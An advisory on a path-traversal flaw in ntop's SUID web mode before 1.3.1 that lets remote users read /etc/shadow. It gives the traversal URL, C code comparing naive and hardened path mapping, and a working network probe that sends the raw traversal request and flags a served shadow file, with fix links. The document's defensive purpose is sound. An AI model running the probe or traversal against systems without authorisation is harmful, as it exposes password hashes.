
Ntop vulnerability

COMMAND

    ntop

SYSTEMS AFFECTED

    ntop prior to 1.3.1

PROBLEM

    Following is based on [ Hackerslab bug_paper ].  ntop displays the top
    network users.  With the -w switch ntop starts in web mode: users
    can point their web browsers at the specified port and browse
    traffic information remotely.

    Supposing ntop is started on port 3000 (ntop -w 3000), the URL
    to access is

        http://hostname:3000/

    The file ~/.ntop specifies the HTTP user/password pairs of those people
    who are allowed to access ntop.  If the ~/.ntop file is missing,
    no security is used, hence everyone can access the traffic
    information.  A simple .ntop file is the following:

        # .ntop File format
        #  user<tab>/<space>pw
        luca      linux

    Please note that an HTTP server is NOT needed in order to use the
    program in web mode: ntop serves the pages itself.  According to the
    paper the ntop binary is installed with SUID permission, so its
    built-in web server reads files with root privileges.  In web mode
    the document root is "/etc/ntop/html", but the web mode does not
    check the URL path against that root.

    So if the URL is

        http://URL:port/../../shadow

    the two ".." components step from /etc/ntop/html up to /etc, and the
    remote user is served /etc/shadow.  In the same way any file on the
    system can be read.
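    The mapping below is an added example written for this page, not
    ntop's own code.  It puts the naive document-root concatenation the
    text describes next to a hardened version that percent-decodes the
    request path, drops "." segments and refuses any ".." segment.  The
    document root /etc/ntop/html is taken from the advisory; the function
    names, buffer sizes and the probe paths in main are assumptions of
    this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define DOCROOT "/etc/ntop/html"   /* document root named in the advisory */

/* Naive mapping, as described for ntop < 1.3.1: the request path is simply
 * appended to the document root, so "/../../shadow" yields a path that the
 * kernel resolves to /etc/shadow. Returns 1 if the result fit in out. */
int naive_map(const char *url, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s%s", DOCROOT, url);
    return n > 0 && (size_t)n < outlen;
}

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Percent-decode before any check, so "%2e%2e" is seen as ".."; refuse
 * malformed escapes and %00, which would truncate the path at the NUL. */
static int url_decode(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        int c = (unsigned char)in[i];
        if (c == '%') {
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)in[i + 2]);
            if (lo < 0) return 0;
            c = hi * 16 + lo;
            i += 2;
        }
        if (c == '\0' || o + 1 >= outlen) return 0;
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return 1;
}

/* Hardened mapping: walk the decoded path segment by segment, drop "" and
 * ".", and reject any ".." outright instead of trying to "pop" it, so the
 * result can never leave DOCROOT. Returns 1 and fills out on success, 0 when
 * the request must be refused (ntop 1.3.1 answers such requests with 401). */
int safe_map(const char *url, char *out, size_t outlen)
{
    char dec[512];
    if (!url_decode(url, dec, sizeof dec) || dec[0] != '/') return 0;

    size_t pos = strlen(DOCROOT);
    if (pos + 1 >= outlen) return 0;
    memcpy(out, DOCROOT, pos + 1);              /* copies the NUL too */

    const char *p = dec;
    while (*p != '\0') {
        while (*p == '/') p++;                  /* collapse "//" */
        const char *seg = p;
        while (*p != '\0' && *p != '/') p++;
        size_t n = (size_t)(p - seg);
        if (n == 0 || (n == 1 && seg[0] == '.')) continue;
        if (n == 2 && seg[0] == '.' && seg[1] == '.') return 0;   /* traversal */
        if (pos + 1 + n >= outlen) return 0;
        out[pos++] = '/';
        memcpy(out + pos, seg, n);
        pos += n;
        out[pos] = '\0';
    }
    return 1;
}

/* Small wrappers for the demo: 1 if the mapper accepts url and yields expected. */
int naive_maps_to(const char *url, const char *expected)
{
    char buf[512];
    return naive_map(url, buf, sizeof buf) && strcmp(buf, expected) == 0;
}

int safe_maps_to(const char *url, const char *expected)
{
    char buf[512];
    return safe_map(url, buf, sizeof buf) && strcmp(buf, expected) == 0;
}

int safe_rejects(const char *url)
{
    char buf[512];
    return !safe_map(url, buf, sizeof buf);
}

int main(void)
{
    /* Constructed probe paths: the advisory's own plus encoded and nested variants. */
    const char *probes[] = { "/index.html", "/../../shadow", "/%2e%2e/%2e%2e/shadow",
                             "/a/../../../shadow", "/%00shadow" };
    char buf[512];
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        naive_map(probes[i], buf, sizeof buf);
        printf("naive %-24s -> %s\n", probes[i], buf);
        if (safe_map(probes[i], buf, sizeof buf))
            printf("safe  %-24s -> %s\n", probes[i], buf);
        else
            printf("safe  %-24s -> refused\n", probes[i]);
    }
    return 0;
}
```

    The check is purely lexical, which is enough to stop the ".." class
    the advisory describes but not a symlink placed under the document
    root; on a real server follow it by opening the file and comparing
    its realpath() (or fstat() identity) against the root.  Refusing ".."
    outright, as ntop 1.3.1 does, is also simpler to get right than
    popping segments, where an underflow above the root must be caught
    separately.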

SOLUTION

    The problem above has been reported to the author and it has  been
    fixed immediately.  There were a few other security related  issues
    which have been fixed as well.   With version 1.3.1 ntop  properly
    returns a 401 code when trying to access '..' paths.
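    One way to confirm the fix on a running instance, as an added example
    that is not part of the advisory or of the ntop distribution: the
    probe sends the advisory's request path as raw bytes, because browsers
    and curl (unless invoked with --path-as-is) collapse the ".." segments
    before sending and would make a still-vulnerable server look patched.
    Host and port come from the command line; recognising /etc/shadow by a
    body that starts with "root:" is an assumption of this example.

```c
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Write the request bytes verbatim. Browsers, and curl without --path-as-is,
 * collapse "/../../shadow" to "/shadow" before sending, which would make a
 * still-vulnerable server look fixed. Returns 1 if the request fit in out. */
int build_request(const char *host, const char *path, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", path, host);
    return n > 0 && (size_t)n < outlen;
}

/* Status code from the response's first line, or -1 if it is not HTTP. */
int parse_status(const char *resp)
{
    unsigned major, minor, code;
    if (sscanf(resp, "HTTP/%u.%u %3u", &major, &minor, &code) != 3) return -1;
    return (int)code;
}

/* 1 if the body after the header block begins like /etc/shadow ("root:"),
 * i.e. the server served the file rather than an error page (assumed heuristic). */
int body_is_shadow(const char *resp)
{
    const char *body = strstr(resp, "\r\n\r\n");
    return body != NULL && strncmp(body + 4, "root:", 5) == 0;
}

/* Connect to host:port, send the probe and return the status code (-1 on
 * network error); *served is set to 1 when the body looks like /etc/shadow. */
int probe_traversal(const char *host, const char *port, int *served)
{
    struct addrinfo hints, *res;
    char req[256], resp[8192];
    size_t got = 0;
    ssize_t n;
    int fd;

    *served = 0;
    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(host, port, &hints, &res) != 0) return -1;
    fd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
    if (fd < 0 || connect(fd, res->ai_addr, res->ai_addrlen) < 0) {
        freeaddrinfo(res);
        if (fd >= 0) close(fd);
        return -1;
    }
    freeaddrinfo(res);

    if (!build_request(host, "/../../shadow", req, sizeof req) ||
        write(fd, req, strlen(req)) != (ssize_t)strlen(req)) {
        close(fd);
        return -1;
    }
    /* Read until the server closes the connection (HTTP/1.0) or the buffer is full. */
    while (got < sizeof resp - 1 &&
           (n = read(fd, resp + got, sizeof resp - 1 - got)) > 0)
        got += (size_t)n;
    close(fd);
    if (got == 0) return -1;
    resp[got] = '\0';
    *served = body_is_shadow(resp);
    return parse_status(resp);
}

int main(int argc, char **argv)
{
    int served, code;
    if (argc != 3) {
        fprintf(stderr, "usage: %s host port\n", argv[0]);
        return 2;
    }
    code = probe_traversal(argv[1], argv[2], &served);
    if (code < 0) {
        fprintf(stderr, "no HTTP response from %s:%s\n", argv[1], argv[2]);
        return 2;
    }
    printf("HTTP %d, body %s\n", code,
           served ? "is /etc/shadow: VULNERABLE" : "is not the file: refused");
    return served;
}
```

    A fixed ntop answers the probe with 401 and an error page; a 200 whose
    body starts with the root entry means the path was still mapped under
    the document root.  Run it only against hosts you are authorised to
    test, and note that the probe must run as a user with no more privilege
    than needed, since the response may contain password hashes.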

    The  "ntop"  package  is  not  a  part  of  Debian 2.1.  No fix is
    necessary.   As  for  Debian  2.2  alias  potato,  this version of
    Debian is  not yet  released.   Fixes are  currently available for
    Alpha, ARM, Intel ia32, Motorola 680x0, PowerPC and the Sun  Sparc
    architecture:

        http://security.debian.org/dists/potato/updates/main/source/ntop_1.2a7-10.diff.gz
        http://security.debian.org/dists/potato/updates/main/source/ntop_1.2a7-10.dsc
        http://security.debian.org/dists/potato/updates/main/source/ntop_1.2a7.orig.tar.gz

        http://security.debian.org/dists/potato/updates/main/binary-alpha/ntop_1.2a7-10_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-arm/ntop_1.2a7-10_arm.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/ntop_1.2a7-10_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/ntop_1.2a7-10_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/ntop_1.2a7-10_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/ntop_1.2a7-10_sparc.deb

    Debian Unstable alias woody is  not yet released and reflects  the
    current development release.  Fixes are the same as for potato.

    For RedHat:

        ftp://updates.redhat.com/powertools/6.2/sparc/ntop-1.3.1-1.sparc.rpm
        ftp://updates.redhat.com/powertools/6.2/i386/ntop-1.3.1-1.i386.rpm
        ftp://updates.redhat.com/powertools/6.2/SRPMS/ntop-1.3.1-1.src.rpm
